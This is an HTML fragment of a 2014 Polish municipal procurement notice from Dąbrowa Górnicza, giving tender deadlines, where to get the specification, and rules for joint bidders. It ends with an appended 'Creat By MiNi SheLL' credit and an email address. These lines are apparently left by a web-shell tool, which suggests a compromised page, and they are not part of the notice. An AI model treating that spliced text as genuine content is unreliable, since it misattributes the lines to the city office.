<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.dabrowa-gornicza.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Dąbrowie Górniczej					 
41-300 Dąbrowa Górnicza,
ul. Graniczna 21 
Wydział Spraw Obywatelskich, piętro I.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.10.2014 godzina 08:30, miejsce: Urząd Miejski w Dąbrowie Górniczej, ul. Graniczna 21, parter stanowisko nr 13 - INFORMACJA.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamówienie nie jest współfinansowane ze środków z Unii Europejskiej. 
2. Zamawiający nie wymaga wniesienia zabezpieczenia należytego wykonania umowy. 
3. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia powinni spełniać warunki udziału w postępowaniu określone w pkt 8 SIWZ oraz złożyć dokumenty i oświadczenia potwierdzające spełnianie tych warunków zgodnie z zapisami zawartymi w pkt 9 SIWZ. W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców, w ofercie muszą być złożone dokumenty i oświadczenia wymienione w pkt, 9.2. i 9.3. SIWZ podpisane przez każdego z nich lub przez pełnomocnika w imieniu każdego z nich. Dokumenty i oświadczenia wymienione w pkt. 9.1.1 oraz pkt. 9.4 SIWZ Wykonawcy składają wspólnie na jednym druku lub pełnomocnik w imieniu wszystkich Wykonawców. Oświadczenie wymienione w pkt. 9.1.1. SIWZ oraz formularz ofertowy wymieniony w pkt. 9.4.1. SIWZ winny być podpisane przez uprawnionych przedstawicieli Wykonawców. Ponadto ww. Wykonawcy ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem.
4. Uszczegółowienie sekcji II.2. ogłoszenie: nie później niż do dnia 26.11.2014 r., z uwzględnieniem terminów cząstkowych określonych w harmonogramie prac (zał. nr 7 do SIWZ).</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com